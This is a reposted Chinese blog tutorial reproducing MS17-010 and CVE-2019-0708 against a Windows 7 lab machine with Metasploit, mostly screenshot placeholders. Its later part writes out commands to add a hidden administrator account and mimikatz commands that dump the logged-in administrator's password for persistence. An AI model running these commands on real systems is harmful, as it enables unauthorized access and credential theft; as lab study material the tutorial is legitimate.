MS17-010 与 CVE-2019-0708 的复现

复现MS17-010(永恒之蓝)

无聊的周末,复现一下MS17-010与CVE-2019-0708。


靶机:
	系统:
		win7 Sp1
	IP:
		192.168.18.131
	下载地址:
		ed2k://|file|cn_windows_7_enterprise_with_sp1_x64_dvd_u_677685.iso|3265574912|E9DB2607EA3B3540F3FE2E388F8C53C4|/

攻击机:
	Kali

环境搭建:

1.将镜像安装完毕,关闭防火墙。

在这里插入图片描述

此时,建议保存一下快照。

2.开启445端口(开启别的端口也如此,如一会用到的3389)

点击高级设置—点击入站规则—右击,新建规则;

在这里插入图片描述
在这里插入图片描述

选择端口,下一步—输入445,下一步—下一步—下一步

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

开始攻击:

1.探测靶机是否开启445端口

在这里插入图片描述

2.开启msf(美少妇)

直接在终端输入命令:msfconsole

在这里插入图片描述

3.对靶机进行探测与攻击

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Ok,到此永恒之蓝演示完毕。

复现CVE-2019-0708

将之前的靶机恢复一下刚刚保存的快照。

环境搭建

1.开启3389端口及配置相关服务

先将端口开启,参考上边445开启;在这里介绍一下如何配置远程桌面连接服务。

在这里插入图片描述

开始攻击

1.探测端口是否打开

在这里插入图片描述

2.对目标进行探测与攻击

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

这里其实是受害机机器架构的问题,只要稍微设置一下即可,

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Ok,cve-2019-0708演示完毕。

以为这就结束了吗,并没有,今天正好没什么事,稍微往下深入一下。

3.创建自己的用户,远程登录目标机器

上命令:
		~在服务器创建用户:
				net user 用户名 密码 /add
		~将某用户放置到管理员组
				net localgroup administrators 用户名 /add
注意的是:
		这里创建密码时,建议设置稍微复杂点,因为可能存在密码复杂性的要求。
		
		一般英文大小写加数字字符   中的任意三种,同时长度超过8位。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

远程连接目标机器,下一步直接点击是即可

在这里插入图片描述
在这里插入图片描述

证明此服务器有人在登录,因为是靶机,我们直接点击是,挤掉admin222用户,
这也是为什么在护网中,红队一般都是半夜工作的原因之一。

在这里插入图片描述

在这里插入图片描述

4.查看原来管理的密码

到这里,我们已经用自己的账号登录了目标机器。

但是万一管理员检查电脑发现多了一个账户他给我们删除了怎么办?

接下来,我们就演示如何搞到管理员,即“admin222“的密码。

(1)先上一下一会用到猕猴桃的代码:

	privilege::debug 				提升权限

	log								新建日志记录

	sekurlsa::logonpasswords 		抓取密码

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Ok,到此稍微完成cve-2019-0708的 复现,另外加了一点稍微皮的操作。
教程应该很详细,有什么问题可以私信或者评论,看到就回复。

猜你喜欢

转载自blog.csdn.net/weixin_43970718/article/details/108186237